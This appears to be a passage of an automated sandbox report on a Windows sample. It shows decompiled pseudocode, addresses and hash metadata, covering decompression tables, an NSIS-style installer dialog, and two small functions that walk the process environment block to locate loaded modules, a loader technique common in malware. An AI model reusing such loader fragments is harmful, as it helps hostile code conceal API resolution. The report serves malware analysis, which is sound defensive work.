                                                                                    										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                    										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                    									} else {
                                                                                    										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                    										_t208 =  *_t284;
                                                                                    										_v36 =  &(_t284[1]);
                                                                                    									}
                                                                                    									_a6 = _t208;
                                                                                    								} else {
                                                                                    									_a4 = 0xc0;
                                                                                    								}
                                                                                    								_t286 = 1 << _v8 - _t186;
                                                                                    								_t244 = _v12 >> _t186;
                                                                                    								while(_t244 < _v40) {
                                                                                    									 *(_t168 + _t244 * 4) = _a4;
                                                                                    									_t244 = _t244 + _t286;
                                                                                    								}
                                                                                    								_t287 = _v12;
                                                                                    								_t246 = 1 << _v44;
                                                                                    								while((_t287 & _t246) != 0) {
                                                                                    									_t287 = _t287 ^ _t246;
                                                                                    									_t246 = _t246 >> 1;
                                                                                    								}
                                                                                    								_t288 = _t287 ^ _t246;
                                                                                    								_v20 = 1;
                                                                                    								_v12 = _t288;
                                                                                    								_t251 = _v16;
                                                                                    								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                    									L60:
                                                                                    									if(_v48 != 0) {
                                                                                    										_t282 = _v48;
                                                                                    										_t283 = _t282 - 1;
                                                                                    										_t200 = _a28 + _t186;
                                                                                    										_v48 = _t283;
                                                                                    										_v24 = _t200;
                                                                                    										if(_v8 <= _t200) {
                                                                                    											goto L45;
                                                                                    										}
                                                                                    										goto L31;
                                                                                    									}
                                                                                    									break;
                                                                                    								} else {
                                                                                    									goto L58;
                                                                                    								}
                                                                                    								do {
                                                                                    									L58:
                                                                                    									_t186 = _t186 - _a28;
                                                                                    									_t251 = _t251 - 1;
                                                                                    								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                    								_v16 = _t251;
                                                                                    								goto L60;
                                                                                    							}
                                                                                    							L61:
                                                                                    							_v8 = _v8 + 1;
                                                                                    							_v32 = _v32 + 4;
                                                                                    							_v44 = _v44 + 1;
                                                                                    						} while (_v8 <= _v28);
                                                                                    						goto L62;
                                                                                    					}
                                                                                    					_t277 = 0;
                                                                                    					do {
                                                                                    						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                    						_t277 = _t277 + 4;
                                                                                    						_t235 = _t235 - 1;
                                                                                    						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                    					} while (_t235 != 0);
                                                                                    					goto L21;
                                                                                    				}
                                                                                    				 *_a24 =  *_a24 & 0x00000000;
                                                                                    				 *_a28 =  *_a28 & 0x00000000;
                                                                                    				return 0;
                                                                                    			}











































































                                                                                    0x00406b36
                                                                                    0x00406b3e
                                                                                    0x00406b42
                                                                                    0x00406b44
                                                                                    0x00406b47
                                                                                    0x00406b49
                                                                                    0x00406b49
                                                                                    0x00406b4b
                                                                                    0x00406b52
                                                                                    0x00406b54
                                                                                    0x00406b54
                                                                                    0x00406b5a
                                                                                    0x00406b6f
                                                                                    0x00406b77
                                                                                    0x00406b79
                                                                                    0x00406b7b
                                                                                    0x00406b7e
                                                                                    0x00406b7f
                                                                                    0x00406b7f
                                                                                    0x00406b85
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406b87
                                                                                    0x00406b8a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406b8a
                                                                                    0x00406b8e
                                                                                    0x00406b91
                                                                                    0x00406b93
                                                                                    0x00406b93
                                                                                    0x00406b96
                                                                                    0x00406b9c
                                                                                    0x00406b9d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406b9d
                                                                                    0x00406ba2
                                                                                    0x00406ba5
                                                                                    0x00406ba7
                                                                                    0x00406ba7
                                                                                    0x00406bad
                                                                                    0x00406baf
                                                                                    0x00406bc0
                                                                                    0x00406bb3
                                                                                    0x00406bb7
                                                                                    0x00406e5c
                                                                                    0x00000000
                                                                                    0x00406e5c
                                                                                    0x00406bbd
                                                                                    0x00406bbe
                                                                                    0x00406bbe
                                                                                    0x00406bc6
                                                                                    0x00406bc9
                                                                                    0x00406bcd
                                                                                    0x00406bcf
                                                                                    0x00406bd1
                                                                                    0x00406bd4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bdc
                                                                                    0x00406be2
                                                                                    0x00406be4
                                                                                    0x00406be6
                                                                                    0x00406be7
                                                                                    0x00406bfc
                                                                                    0x00406bfc
                                                                                    0x00406bff
                                                                                    0x00406c01
                                                                                    0x00406c01
                                                                                    0x00406c03
                                                                                    0x00406c08
                                                                                    0x00406c0a
                                                                                    0x00406c11
                                                                                    0x00406c13
                                                                                    0x00406c1b
                                                                                    0x00406c1b
                                                                                    0x00406c1d
                                                                                    0x00406c1e
                                                                                    0x00406c2d
                                                                                    0x00406c31
                                                                                    0x00406c35
                                                                                    0x00406c38
                                                                                    0x00406c3b
                                                                                    0x00406c40
                                                                                    0x00406c43
                                                                                    0x00406c49
                                                                                    0x00406c50
                                                                                    0x00406c56
                                                                                    0x00406e4f
                                                                                    0x00406e4f
                                                                                    0x00406e54
                                                                                    0x00406e63
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e54
                                                                                    0x00406c63
                                                                                    0x00406c66
                                                                                    0x00406c69
                                                                                    0x00406c6c
                                                                                    0x00406c70
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c7b
                                                                                    0x00406c7e
                                                                                    0x00406c7f
                                                                                    0x00406c81
                                                                                    0x00406c87
                                                                                    0x00406c8a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c90
                                                                                    0x00406c91
                                                                                    0x00406c94
                                                                                    0x00406c97
                                                                                    0x00406c9a
                                                                                    0x00406ca0
                                                                                    0x00406ca2
                                                                                    0x00406ca2
                                                                                    0x00406caa
                                                                                    0x00406cae
                                                                                    0x00406cb3
                                                                                    0x00406cd8
                                                                                    0x00406cde
                                                                                    0x00406ce0
                                                                                    0x00406ce2
                                                                                    0x00406ce5
                                                                                    0x00406cee
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cb5
                                                                                    0x00406cb5
                                                                                    0x00406cbe
                                                                                    0x00406cc2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cd3
                                                                                    0x00406cd3
                                                                                    0x00406cd6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cc6
                                                                                    0x00406cc9
                                                                                    0x00406ccb
                                                                                    0x00406ccf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cd1
                                                                                    0x00406cd1
                                                                                    0x00000000
                                                                                    0x00406cd3
                                                                                    0x00406cf7
                                                                                    0x00406cfd
                                                                                    0x00406d07
                                                                                    0x00406d09
                                                                                    0x00406d0e
                                                                                    0x00406d10
                                                                                    0x00406d46
                                                                                    0x00406d12
                                                                                    0x00406d12
                                                                                    0x00406d15
                                                                                    0x00406d18
                                                                                    0x00406d22
                                                                                    0x00406d25
                                                                                    0x00406d2c
                                                                                    0x00406d37
                                                                                    0x00406d3e
                                                                                    0x00406d3e
                                                                                    0x00406d48
                                                                                    0x00406d4b
                                                                                    0x00406d4d
                                                                                    0x00406d53
                                                                                    0x00406d53
                                                                                    0x00406d5c
                                                                                    0x00406d5f
                                                                                    0x00406d64
                                                                                    0x00406d73
                                                                                    0x00406d7b
                                                                                    0x00406d80
                                                                                    0x00406da4
                                                                                    0x00406dac
                                                                                    0x00406db0
                                                                                    0x00406db6
                                                                                    0x00406d82
                                                                                    0x00406d90
                                                                                    0x00406d93
                                                                                    0x00406d99
                                                                                    0x00406d99
                                                                                    0x00406dba
                                                                                    0x00406d75
                                                                                    0x00406d75
                                                                                    0x00406d75
                                                                                    0x00406dcb
                                                                                    0x00406dcf
                                                                                    0x00406ddb
                                                                                    0x00406dd6
                                                                                    0x00406dd9
                                                                                    0x00406dd9
                                                                                    0x00406de3
                                                                                    0x00406de8
                                                                                    0x00406df0
                                                                                    0x00406dec
                                                                                    0x00406dee
                                                                                    0x00406dee
                                                                                    0x00406df6
                                                                                    0x00406df8
                                                                                    0x00406dff
                                                                                    0x00406e09
                                                                                    0x00406e13
                                                                                    0x00406e2f
                                                                                    0x00406e33
                                                                                    0x00406c78
                                                                                    0x00406c7e
                                                                                    0x00406c7f
                                                                                    0x00406c81
                                                                                    0x00406c87
                                                                                    0x00406c8a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c8a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e15
                                                                                    0x00406e15
                                                                                    0x00406e15
                                                                                    0x00406e1a
                                                                                    0x00406e23
                                                                                    0x00406e2c
                                                                                    0x00000000
                                                                                    0x00406e2c
                                                                                    0x00406e39
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e43
                                                                                    0x00406e46
                                                                                    0x00000000
                                                                                    0x00406c69
                                                                                    0x00406be9
                                                                                    0x00406beb
                                                                                    0x00406beb
                                                                                    0x00406bef
                                                                                    0x00406bf2
                                                                                    0x00406bf3
                                                                                    0x00406bf3
                                                                                    0x00000000
                                                                                    0x00406beb
                                                                                    0x00406b5f
                                                                                    0x00406b65
                                                                                    0x00000000

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                                                                    • Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
                                                                                    • Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                                                                    • Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E737948E9(void* __eflags, intOrPtr _a4) {
                                                                                    				intOrPtr* _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				signed int _t35;
                                                                                    
                                                                                    				_v16 =  *[fs:0x30];
                                                                                    				_v12 =  *((intOrPtr*)(_v16 + 0xc));
                                                                                    				_v20 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                    				_v8 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                    				while(E7379482D(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
                                                                                    					_v8 =  *_v8;
                                                                                    					if(_v8 != _v20) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					return 0;
                                                                                    				}
                                                                                    				return  *((intOrPtr*)(_v8 + 0x28));
                                                                                    			}








                                                                                    0x737948f5
                                                                                    0x737948fe
                                                                                    0x73794907
                                                                                    0x73794910
                                                                                    0x73794913
                                                                                    0x73794932
                                                                                    0x7379493b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x7379493d
                                                                                    0x00000000

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.223621335.0000000073793000.00000040.00020000.sdmp, Offset: 73790000, based on PE: true
                                                                                    • Associated: 00000000.00000002.223574209.0000000073790000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223588828.0000000073791000.00000020.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223600635.0000000073792000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223638092.0000000073795000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                    • Instruction ID: 4775a2760439c137d23ef2982d1923a7ef2b477834d5b782c4d93af9dc29442c
                                                                                    • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                    • Instruction Fuzzy Hash: A7014D78A14218EFDB41DF98D681A9DBBF9FB08220F118596E854E7321D330EE50EB44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E737946E6() {
                                                                                    
                                                                                    				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                                                                    			}



                                                                                    0x737946fd

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.223621335.0000000073793000.00000040.00020000.sdmp, Offset: 73790000, based on PE: true
                                                                                    • Associated: 00000000.00000002.223574209.0000000073790000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223588828.0000000073791000.00000020.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223600635.0000000073792000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223638092.0000000073795000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                    • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                                    • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                    • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 83%
                                                                                    			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                    				struct HWND__* _v32;
                                                                                    				void* _v84;
                                                                                    				void* _v88;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t35;
                                                                                    				signed int _t37;
                                                                                    				signed int _t39;
                                                                                    				struct HWND__* _t49;
                                                                                    				signed int _t67;
                                                                                    				struct HWND__* _t73;
                                                                                    				signed int _t86;
                                                                                    				struct HWND__* _t91;
                                                                                    				signed int _t99;
                                                                                    				int _t103;
                                                                                    				signed int _t115;
                                                                                    				signed int _t116;
                                                                                    				int _t117;
                                                                                    				signed int _t122;
                                                                                    				struct HWND__* _t125;
                                                                                    				struct HWND__* _t126;
                                                                                    				int _t127;
                                                                                    				long _t130;
                                                                                    				int _t132;
                                                                                    				int _t133;
                                                                                    				void* _t134;
                                                                                    
                                                                                    				_t115 = _a8;
                                                                                    				if(_t115 == 0x110 || _t115 == 0x408) {
                                                                                    					_t35 = _a12;
                                                                                    					_t125 = _a4;
                                                                                    					__eflags = _t115 - 0x110;
                                                                                    					 *0x42a084 = _t35;
                                                                                    					if(_t115 == 0x110) {
                                                                                    						 *0x42ec28 = _t125;
                                                                                    						 *0x42a098 = GetDlgItem(_t125, 1);
                                                                                    						_t91 = GetDlgItem(_t125, 2);
                                                                                    						_push(0xffffffff);
                                                                                    						_push(0x1c);
                                                                                    						 *0x429060 = _t91;
                                                                                    						E00403E83(_t125);
                                                                                    						SetClassLongA(_t125, 0xfffffff2,  *0x42e408);
                                                                                    						 *0x42e3ec = E0040140B(4);
                                                                                    						_t35 = 1;
                                                                                    						__eflags = 1;
                                                                                    						 *0x42a084 = 1;
                                                                                    					}
                                                                                    					_t122 =  *0x4091ac; // 0xffffffff
                                                                                    					_t133 = 0;
                                                                                    					_t130 = (_t122 << 6) +  *0x42ec40;
                                                                                    					__eflags = _t122;
                                                                                    					if(_t122 < 0) {
                                                                                    						L34:
                                                                                    						E00403ECF(0x40b);
                                                                                    						while(1) {
                                                                                    							_t37 =  *0x42a084;
                                                                                    							 *0x4091ac =  *0x4091ac + _t37;
                                                                                    							_t130 = _t130 + (_t37 << 6);
                                                                                    							_t39 =  *0x4091ac; // 0xffffffff
                                                                                    							__eflags = _t39 -  *0x42ec44;
                                                                                    							if(_t39 ==  *0x42ec44) {
                                                                                    								E0040140B(1);
                                                                                    							}
                                                                                    							__eflags =  *0x42e3ec - _t133;
                                                                                    							if( *0x42e3ec != _t133) {
                                                                                    								break;
                                                                                    							}
                                                                                    							__eflags =  *0x4091ac -  *0x42ec44; // 0xffffffff
                                                                                    							if(__eflags >= 0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_t116 =  *(_t130 + 0x14);
                                                                                    							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
                                                                                    							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                                                    							_push(0xfffffc19);
                                                                                    							E00403E83(_t125);
                                                                                    							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                                                    							_push(0xfffffc1b);
                                                                                    							E00403E83(_t125);
                                                                                    							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                                                    							_push(0xfffffc1a);
                                                                                    							E00403E83(_t125);
                                                                                    							_t49 = GetDlgItem(_t125, 3);
                                                                                    							__eflags =  *0x42ecac - _t133;
                                                                                    							_v32 = _t49;
                                                                                    							if( *0x42ecac != _t133) {
                                                                                    								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                                                    								__eflags = _t116;
                                                                                    							}
                                                                                    							ShowWindow(_t49, _t116 & 0x00000008);
                                                                                    							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                                                                    							E00403EA5(_t116 & 0x00000002);
                                                                                    							_t117 = _t116 & 0x00000004;
                                                                                    							EnableWindow( *0x429060, _t117);
                                                                                    							__eflags = _t117 - _t133;
                                                                                    							if(_t117 == _t133) {
                                                                                    								_push(1);
                                                                                    							} else {
                                                                                    								_push(_t133);
                                                                                    							}
                                                                                    							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                                                    							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                                                    							__eflags =  *0x42ecac - _t133;
                                                                                    							if( *0x42ecac == _t133) {
                                                                                    								_push( *0x42a098);
                                                                                    							} else {
                                                                                    								SendMessageA(_t125, 0x401, 2, _t133);
                                                                                    								_push( *0x429060);
                                                                                    							}
                                                                                    							E00403EB8();
                                                                                    							E00405BC7(0x42a0a0, 0x42e420);
                                                                                    							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                                                    							SetWindowTextA(_t125, 0x42a0a0);
                                                                                    							_push(_t133);
                                                                                    							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                                                    							__eflags = _t67;
                                                                                    							if(_t67 != 0) {
                                                                                    								continue;
                                                                                    							} else {
                                                                                    								__eflags =  *_t130 - _t133;
                                                                                    								if( *_t130 == _t133) {
                                                                                    									continue;
                                                                                    								}
                                                                                    								__eflags =  *(_t130 + 4) - 5;
                                                                                    								if( *(_t130 + 4) != 5) {
                                                                                    									DestroyWindow( *0x42e3f8);
                                                                                    									 *0x429870 = _t130;
                                                                                    									__eflags =  *_t130 - _t133;
                                                                                    									if( *_t130 <= _t133) {
                                                                                    										goto L58;
                                                                                    									}
                                                                                    									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
                                                                                    									__eflags = _t73 - _t133;
                                                                                    									 *0x42e3f8 = _t73;
                                                                                    									if(_t73 == _t133) {
                                                                                    										goto L58;
                                                                                    									}
                                                                                    									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                                                    									_push(6);
                                                                                    									E00403E83(_t73);
                                                                                    									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                                                    									ScreenToClient(_t125, _t134 + 0x10);
                                                                                    									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                                                    									_push(_t133);
                                                                                    									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                                                    									__eflags =  *0x42e3ec - _t133;
                                                                                    									if( *0x42e3ec != _t133) {
                                                                                    										goto L61;
                                                                                    									}
                                                                                    									ShowWindow( *0x42e3f8, 8);
                                                                                    									E00403ECF(0x405);
                                                                                    									goto L58;
                                                                                    								}
                                                                                    								__eflags =  *0x42ecac - _t133;
                                                                                    								if( *0x42ecac != _t133) {
                                                                                    									goto L61;
                                                                                    								}
                                                                                    								__eflags =  *0x42eca0 - _t133;
                                                                                    								if( *0x42eca0 != _t133) {
                                                                                    									continue;
                                                                                    								}
                                                                                    								goto L61;
                                                                                    							}
                                                                                    						}
                                                                                    						DestroyWindow( *0x42e3f8);
                                                                                    						 *0x42ec28 = _t133;
                                                                                    						EndDialog(_t125,  *0x429468);
                                                                                    						goto L58;
                                                                                    					} else {
                                                                                    						__eflags = _t35 - 1;
                                                                                    						if(_t35 != 1) {
                                                                                    							L33:
                                                                                    							__eflags =  *_t130 - _t133;
                                                                                    							if( *_t130 == _t133) {
                                                                                    								goto L61;
                                                                                    							}
                                                                                    							goto L34;
                                                                                    						}
                                                                                    						_push(0);
                                                                                    						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                                                    						__eflags = _t86;
                                                                                    						if(_t86 == 0) {
                                                                                    							goto L33;
                                                                                    						}
                                                                                    						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
                                                                                    						__eflags =  *0x42e3ec;
                                                                                    						return 0 |  *0x42e3ec == 0x00000000;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t125 = _a4;
                                                                                    					_t133 = 0;
                                                                                    					if(_t115 == 0x47) {
                                                                                    						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
                                                                                    					}
                                                                                    					if(_t115 == 5) {
                                                                                    						asm("sbb eax, eax");
                                                                                    						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
                                                                                    					}
                                                                                    					if(_t115 != 0x40d) {
                                                                                    						__eflags = _t115 - 0x11;
                                                                                    						if(_t115 != 0x11) {
                                                                                    							__eflags = _t115 - 0x111;
                                                                                    							if(_t115 != 0x111) {
                                                                                    								L26:
                                                                                    								return E00403EEA(_t115, _a12, _a16);
                                                                                    							}
                                                                                    							_t132 = _a12 & 0x0000ffff;
                                                                                    							_t126 = GetDlgItem(_t125, _t132);
                                                                                    							__eflags = _t126 - _t133;
                                                                                    							if(_t126 == _t133) {
                                                                                    								L13:
                                                                                    								__eflags = _t132 - 1;
                                                                                    								if(_t132 != 1) {
                                                                                    									__eflags = _t132 - 3;
                                                                                    									if(_t132 != 3) {
                                                                                    										_t127 = 2;
                                                                                    										__eflags = _t132 - _t127;
                                                                                    										if(_t132 != _t127) {
                                                                                    											L25:
                                                                                    											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
                                                                                    											goto L26;
                                                                                    										}
                                                                                    										__eflags =  *0x42ecac - _t133;
                                                                                    										if( *0x42ecac == _t133) {
                                                                                    											_t99 = E0040140B(3);
                                                                                    											__eflags = _t99;
                                                                                    											if(_t99 != 0) {
                                                                                    												goto L26;
                                                                                    											}
                                                                                    											 *0x429468 = 1;
                                                                                    											L21:
                                                                                    											_push(0x78);
                                                                                    											L22:
                                                                                    											E00403E5C();
                                                                                    											goto L26;
                                                                                    										}
                                                                                    										E0040140B(_t127);
                                                                                    										 *0x429468 = _t127;
                                                                                    										goto L21;
                                                                                    									}
                                                                                    									__eflags =  *0x4091ac - _t133; // 0xffffffff
                                                                                    									if(__eflags <= 0) {
                                                                                    										goto L25;
                                                                                    									}
                                                                                    									_push(0xffffffff);
                                                                                    									goto L22;
                                                                                    								}
                                                                                    								_push(_t132);
                                                                                    								goto L22;
                                                                                    							}
                                                                                    							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                                                    							_t103 = IsWindowEnabled(_t126);
                                                                                    							__eflags = _t103;
                                                                                    							if(_t103 == 0) {
                                                                                    								goto L61;
                                                                                    							}
                                                                                    							goto L13;
                                                                                    						}
                                                                                    						SetWindowLongA(_t125, _t133, _t133);
                                                                                    						return 1;
                                                                                    					} else {
                                                                                    						DestroyWindow( *0x42e3f8);
                                                                                    						 *0x42e3f8 = _a12;
                                                                                    						L58:
                                                                                    						if( *0x42b0a0 == _t133 &&  *0x42e3f8 != _t133) {
                                                                                    							ShowWindow(_t125, 0xa);
                                                                                    							 *0x42b0a0 = 1;
                                                                                    						}
                                                                                    						L61:
                                                                                    						return 0;
                                                                                    					}
                                                                                    				}
                                                                                    			}






























                                                                                    0x004039b9
                                                                                    0x004039c2
                                                                                    0x00403b03
                                                                                    0x00403b07
                                                                                    0x00403b0b
                                                                                    0x00403b0d
                                                                                    0x00403b12
                                                                                    0x00403b1d
                                                                                    0x00403b28
                                                                                    0x00403b2d
                                                                                    0x00403b2f
                                                                                    0x00403b31
                                                                                    0x00403b34
                                                                                    0x00403b39
                                                                                    0x00403b47
                                                                                    0x00403b54
                                                                                    0x00403b5b
                                                                                    0x00403b5b
                                                                                    0x00403b5c
                                                                                    0x00403b5c
                                                                                    0x00403b61
                                                                                    0x00403b67
                                                                                    0x00403b6e
                                                                                    0x00403b74
                                                                                    0x00403b76
                                                                                    0x00403bb6
                                                                                    0x00403bbb
                                                                                    0x00403bc0
                                                                                    0x00403bc0
                                                                                    0x00403bc5
                                                                                    0x00403bce
                                                                                    0x00403bd0
                                                                                    0x00403bd5
                                                                                    0x00403bdb
                                                                                    0x00403bdf
                                                                                    0x00403bdf
                                                                                    0x00403be4
                                                                                    0x00403bea
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403bf5
                                                                                    0x00403bfb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403c04
                                                                                    0x00403c0c
                                                                                    0x00403c11
                                                                                    0x00403c14
                                                                                    0x00403c1a
                                                                                    0x00403c1f
                                                                                    0x00403c22
                                                                                    0x00403c28
                                                                                    0x00403c2d
                                                                                    0x00403c30
                                                                                    0x00403c36
                                                                                    0x00403c3e
                                                                                    0x00403c44
                                                                                    0x00403c4a
                                                                                    0x00403c4e
                                                                                    0x00403c55
                                                                                    0x00403c55
                                                                                    0x00403c55
                                                                                    0x00403c5f
                                                                                    0x00403c71
                                                                                    0x00403c7d
                                                                                    0x00403c82
                                                                                    0x00403c8c
                                                                                    0x00403c92
                                                                                    0x00403c94
                                                                                    0x00403c99
                                                                                    0x00403c96
                                                                                    0x00403c96
                                                                                    0x00403c96
                                                                                    0x00403ca9
                                                                                    0x00403cc1
                                                                                    0x00403cc3
                                                                                    0x00403cc9
                                                                                    0x00403cde
                                                                                    0x00403ccb
                                                                                    0x00403cd4
                                                                                    0x00403cd6
                                                                                    0x00403cd6
                                                                                    0x00403ce4
                                                                                    0x00403cf4
                                                                                    0x00403d05
                                                                                    0x00403d0c
                                                                                    0x00403d12
                                                                                    0x00403d16
                                                                                    0x00403d1b
                                                                                    0x00403d1d
                                                                                    0x00000000
                                                                                    0x00403d23
                                                                                    0x00403d23
                                                                                    0x00403d25
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403d2b
                                                                                    0x00403d2f
                                                                                    0x00403d54
                                                                                    0x00403d5a
                                                                                    0x00403d60
                                                                                    0x00403d62
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403d88
                                                                                    0x00403d8e
                                                                                    0x00403d90
                                                                                    0x00403d95
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403d9b
                                                                                    0x00403d9e
                                                                                    0x00403da1
                                                                                    0x00403db8
                                                                                    0x00403dc4
                                                                                    0x00403ddd
                                                                                    0x00403de3
                                                                                    0x00403de7
                                                                                    0x00403dec
                                                                                    0x00403df2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403dfc
                                                                                    0x00403e07
                                                                                    0x00000000
                                                                                    0x00403e07
                                                                                    0x00403d31
                                                                                    0x00403d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403d3d
                                                                                    0x00403d43
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403d49
                                                                                    0x00403d1d
                                                                                    0x00403e14
                                                                                    0x00403e20
                                                                                    0x00403e27
                                                                                    0x00000000
                                                                                    0x00403b78
                                                                                    0x00403b78
                                                                                    0x00403b7b
                                                                                    0x00403bae
                                                                                    0x00403bae
                                                                                    0x00403bb0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
